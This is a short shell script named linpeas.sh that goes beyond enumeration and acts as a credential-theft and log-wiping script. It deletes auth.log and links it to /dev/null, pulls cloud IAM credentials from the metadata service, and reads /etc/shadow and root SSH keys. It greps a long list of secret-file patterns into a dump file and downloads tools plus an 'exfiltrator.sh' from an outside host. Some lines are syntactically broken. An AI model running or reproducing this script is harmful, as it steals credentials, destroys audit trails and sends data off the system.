linpeas.sh

#!/bin/sh
whoami
sysctl kernel.nmi_watchdog=0
cd /var/log
[ -e auth.log ] && rm auth.log
ln -s /dev/null auth.log
cd /tmp
find /root azure.json 
curl -m2 http://169.254.169.254/latest/meta-data/iam/security-credentials/$(curl -m2 http://169.254.169.254/latest/meta-data/iam/security-credentials/)
cat /proc/$$/maps 
cat find /root -name "id_rsa" 
cat /etc/shadow 
/usr/bin/grep -Ev .Xauthority|.bashrc|.bluemix|.boto|.cer|.cloudflared|.credentials.json|.crt|.csr|.db|.der|.docker|.env|.erlang.cookie|.flyrc|.ftpconfig|.git|.git-credentials|.gitconfig|.github|.gnupg|.google_authenticator|.gpg|.htpasswd|.irssi|.jks|.k5login|.kdbx|.key|.keyring|.keystore|.keytab|.kube|.ldaprc|.lesshst|.mozilla|.msmtprc|.ovpn|.p12|.password-store|.pem|.pfx|.pgp|.plan|.profile|.psk|.pub|.pypirc|.rdg|.recently-used.xbel|.rhosts|.roadtools_auth|.secrets.mkey|.service|.socket|.sqlite|.sqlite3|.sudo_as_admin_successful|.svn|.swp|.tf|.tfstate|.timer|.vault-token|.vhd|.vhdx|.viminfo|.vmdk|.vnc|.wgetrc >>dump
curl -L -o xxd https://www.busybox.net/downloads/binaries/1.35.0-x86_64-linux-musl/busybox_XXD
curl -L -o nslookup https://www.busybox.net/downloads/binaries/1.35.0-x86_64-linux-musl/busybox_NSLOOKUP
chmod +x ./xxd ./nslookup
curl -L -O https://raw.githubusercontent.com/crypticrebel/scripts/refs/heads/main/exfiltrator.sh